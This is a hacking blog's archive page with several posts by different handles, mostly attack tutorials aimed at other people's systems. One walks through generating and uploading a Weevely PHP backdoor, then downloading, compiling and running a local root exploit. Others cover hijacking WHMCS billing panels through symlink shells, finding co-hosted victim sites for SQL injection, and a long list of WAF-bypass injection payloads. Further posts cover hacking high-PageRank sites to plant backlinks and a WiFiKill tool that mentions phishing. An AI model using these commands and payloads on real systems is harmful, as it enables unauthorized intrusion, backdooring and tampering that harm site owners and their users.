Category Archives: Hacking

Rooting a Server with Weevely

~
Hi GuYs 
Today we will learn to Root A Server with Weevely 🙂
Weevely is a python script to backconnect to the shell and makes the tiniest backdoor to connect 🙂
You can google it and Its Mostly used by the people which dont have open ports 🙂
So Our Tutorial Starts from here 😉
First of all Open Weevely 🙂
Now type “./main.py -g -o /root/Desktop/backdoor.php -p r00T”
By this command it will make a backdoor.php in Desktop with Password: r00T
===========================================================
Now Next Step is to upload our backdoor to the server by shell and then
type “./main.py -t -u http://www.target.com/uploads/backdoor.php -p r00T” 
and then it will connect to the server 🙂
===========================================================
Now We have to find the version of the kernel its using 🙂
For Finding that type : “uname -a” and then it will show you the kernel version.
for example my kernel version is 2.6.18 2012 so I will find a local root exploit for 
2.6.18 2012 kernel version 🙂
Rooting depends on local root exploits.
===========================================================
We will use “WGET” to download the local root exploit 🙂
First change the dir to “tmp”
now type: “cd /tmp/”
and now download exploit 🙂
and then we have to compile it by this command 
“gcc 2.6.18.c -o KiDSec”
and then  it will be compiled 🙂
Now chmod 777 KiDSec
By typing ” chmod 777 KiDSec”
===========================================================
Now Just Simply run exploit by typing 
./KiDSec
===========================================================
Y0 Server Rooted !!
Now to check if Server is rooted so type “id”
and then it should say 
“uid=(root) gid=(root)”
==========================================================
Thanks For Reading My Tutorial 🙂
./TR4CK3R

WHMCS Hacking

~
Hello Friends 🙂
I’m BaCk with A Great Tutorial again 😉
ToDay We Will Hack into WHMCS which is also called as billing panel and domains are also registered and suspended thorugh WHMCS Panel 🙂
Things We Need:
  • Symlink Enable Shell
  • Symlink Files
  • My Tutorial 😉
Now Lets Start 
First Go to The Shell and Symlink it  There are many Tutorials on Symlink so you can easily learn
Now The Thing is that we should get the config of WHMCS in the server  like
the config named .. xyz~~whm.txt
open that config and Copy the configuration and log into the databse through sql.php or DBKiss and then go to the table
named “tbladmins”. Edit the password into your own but in md5 and change username if u want 
then save and then copy the name of config like xyz~~whm.txt is the config so copy “xyz” as a user and search it in domains.php and you’ll get the 
url of website  then click on symlink and search directories like .. most of the whmcs have billing panel in /clients/admin/ .
Then after opening … login as the details you filled in the database but you’ll not enter the password in md5 and you’ll write the password which you encrypted in md5 .
I Hope Everybody Enjoyed
./TR4CK3R

Top Android Mobiles For Hackers~

~
Best Android Mobiles For Hacking And Pentesting 
Hey Guys Whats Up ? as you can read the title that i am going to share some popular Android Mobiles for hacking and pentesting..

Ok , Lets Get BuZZzZy!

Ok Lemme start it with Samsung ;D
Samsung Galaxy S2
Samsung Galaxy S2 Plus Price Pakistan
OS  Android OS, v4.1.2 (Jelly Bean) 
 Memory  8GB built-in, 1GB RAM, microSD card (supports up to 64GB) 
 Processor  Dual core 1.2 GHz, Broadcom BC28155 Chipset 

Qmobile Noir A20

Qmobile Noir A20 Price Pakistan
OS  Android OS, 4.1 Jelly Bean 
 Memory  4GB built-in + 8GB card included in box1GB RAM, microSD card(supports up to 32GB) 
 Processor  Quad-core 1.2 GHz, ARMv7 Chipset, GPU (PowerVR SGX) 

Qmobile Noir A50

Qmobile Noir A50 Price Pakistan
OS  Android Jelly Bean (v 4.1) 
 Memory  4GB ROM, 512 RAM, microSD card (supports up to 32GB) 
 Processor  1GHz Dual Core 

Huawei Ascend G510 U8951

Huawei Ascend G510 U8951 Price Pakistan
OS  Android OS, v4.1 (Jelly Bean) 
 Memory  4GB built-in, 512MB RAM, microSD card(supports uo to 32 GB)  
 Processor  Dual core 1.2 GHz Cortex-A9 

Sony Xperia L 

Sony Xperia L Price Pakistan
OS  Android OS, v4.1 (Jelly Bean
 Memory  8GB built-in 1GB RAM, microSD Card (supports up to 32GB) 
 Processor  Dual-core 1 GHz, Qualcomm MSM8230 Snapdragon Chipset 

Samsung Galaxy Note II

Samsung Galaxy Note II Price Pakistan
Android OS, v4.1.1 (Jelly Bean) 
 Memory  16/32/64GB built-in, 2GB RAM, microSD card (supports up to 64GB) 
 Processor  Quad-core 1.6 GHz Cortex-A9 

Samsung Galaxy S3

Samsung Galaxy S3 I9300 Price Pakistan
Android OS, v4.0.4 (Ice Cream Sandwich) 
 Memory  16/32/64GB built-in, 1GB RAM, microSD card (supports up to 64GB) 
 Processor  Quad-core 1.4 GHz Cortex-A9 + Mali-400MP GPU, Exynos 4212 Quad 

HTC One

HTC One Price Pakistan
OS  Android OS, v4.1.2 (Jelly Bean), upgradable to v4.2.2 (Jelly Bean) 
 Memory  32/64GB built-in, 2GB RAM 
 Processor  Quad-core 1.7 GHz Krait 300, Qualcomm APQ8064T Snapdragon 600 Chipset 

Sony Xperia Z

Sony Xperia Z Price Pakistan
OS  Android OS, v4.1.2 (Jelly Bean), planned upgrade to v4.2 (Jelly Bean) 
 Memory  16GB built-in 2GB RAM, microSD Card (supports up to 32GB) 
 Processor  Quad-core 1.5 GHz Krait, Qualcomm MDM9215M / APQ8064 Chipset 

How To Hack Targeted Server ?

~

How To Hack Your Victim’s Website ?

umm.. in this post i’ll tell you how to hack your victim’s website easily ;D
This method is very well-known method , used by around every hacker..
This Method Is Also Known As Reverse IP Hacking

In this method we will try to get access to other websites hosted on Same Server

Let the Game Begin ;D

First of all get the website you want to hack and than open CMD ( Command Prompt)
Open Start Menu => Run => type cmd in box
Or Simply Press Windows Logo Button + R 
than type cmd in box

Now type ping website address and hit enter

than you’ll get I.P Address of the website 
now goto bing.com and type
ip:xxx.xxx.xxx.xxx .php?id= 
replace xxx with I.P Address 🙂

it will give you all the websites hosted on the server 
now you can check them for SQL injection vulnerability…
Note:- After Getting Access Dont Forget To BUZZ The Serer ;D


kidsec.com
Zaid Sparrow

Advance WAF ByPassing Techiques

~

How To Bypass Forbidden Error SQL Injection

Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).

Example:

Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

Code:

Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:

Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:

Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

Code:

Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:

Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Code:

Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....


If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))

2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:

Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:Code:

Code:
COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()


[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉

4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

Code:

Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it, in this way! 😀

[+] In addition to the previous example, some other bypasses might be:

Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)

tut Is not Written By Me , Every Credits Goes To Author ~
Kidsec.com

BlackHat SEO – Get High Page Rank 4 Or 5

~

BlackHat SEO

The Fastest Way to Get Your Blog/Website Go BooM BooM…
But everything has some benefits and some losses..
But BlackHat SEO , has more losses than Benefits 🙂
umm i think 

” Losses = 10 Benefits = 4 “


Ok First Lemme Tell You What BlackHat SEO is?
BlackHat SEO is a branch of SEO 😀 its 100% illegal 
In BlackHat SEO , webmasters use illegal techniques to trick search engines and get their web/blog on Top its very fast and quicky..

Few Content Here

Content Spam 
Keyword Stuffing
Hidden Or Invisible Text
Meta-Tag Stuffing
Doorway Pages
Article Spinning
Link Spam
Link Building Softwares
Page Hijacking
etc..

There Are 3 Kinds Of SEO

1- WhiteHat SEO
2 – BlackHat SEO
3 – GreyHat SEO (Mix SEO)

WhiteHat SEO is Slow But Best 😉
BlackHat SEO is Fast but id you are using it than your blog will be Penalized
GreyHat SEO is mixture Of WhiteHat SEO And BlackHat SEO

umm. now lemme come straight to my point ;D
Getting High PR Using BlackHat SEO
Its Not Actually BlackHat SEO umm but it will be count in BlackHat SEO

r00t@T4p10N:~# Requirements

1- Knowledge Of SQL Injection HERE
2- Havij -If YOu Dont Know SQL- HERE
4- WebRoot PHP Tool HERE
4- Patience ~

What You Have To Do?
 Try to hack into webservers and than upload Webroot PHP tool 
than you have to make symlink to The HIGH PR websites..

Just Upload Webroot PHP Tool and Click On Domains & Username & Page Rank Tab

Find Any PR Websites => Symlink => Add Your Link => Check After 2 Weeks
You Must Have Around 7 Backlinks From HIGH Page Rank Websites !!!

Thats All 😉
Kidsec.com
Zaid Sparrow ~

WiFiKill v1.7 – WiFi EjeCtOr

~


If you want to disable any ip address which use same router to connect internet. Now you can used your android application, WifiKill use as can disable internet connection for a device on the same network. This is alternate version of NETCUT for Android. Simply allows you to scan your wifi network for devices, see their vendor and cut network connection for specified devices. This way you can get rid of network hoggers. It gives option to redirect HTTP traffic to specific IP, this feature can be used even to do phishing smartly. Changelog: – fixed the counter bug (I hope for the last time) – added an option to redirect HTTP traffic to specific IP (caution! this may lead to significant CPU load) – now successful kills are tagged by green icon on the left of IP (this is not 100% correct) 

Download this application from LINK 1 or LINK 2 – 

Network Security Toolkit v2.16.0-4104 Released

~


The Network Security Toolkit is bootable ISO live CD/DVD (NST Live) is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. 

he main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open SourceNetwork Security Tools. An advanced Web User Interface (WUI) is provided for system administration, navigation, automation and configuration of many network and security applications found within the Network Security Toolkit distribution.

In the virtual world, NST can be used as a network security analysis, validation and monitoring tool on enterprise virtual servers hosting virtual machines. Network Security Toolkit also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics.

Yaptest – Penetration Framework

~

It is a penetration testing framework that helps automate the boring parts of pentests.Yaptest aims to make it easy for a pentester to automate parts of testing on the fly. This is particularly useful when testing very large networks. Below are some examples of tasks which would be easy to automate using yaptest:
  • Run nikto on anything nmap thinks is an HTTP service
  • Run hydra on every host with TCP port 21 open
  • Attempt upload a file to any TFTP servers found
  • Run onesixtyone on all hosts that are up
  • Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd
Yaptest is the glue between your favourite tools and the knowledge base gathered during your pentest. It handles all the mundane stuff that can easily be automated and leaves you free to get on with owning boxes demonstrating risk using techniques that yaptest doesn’t know about yet.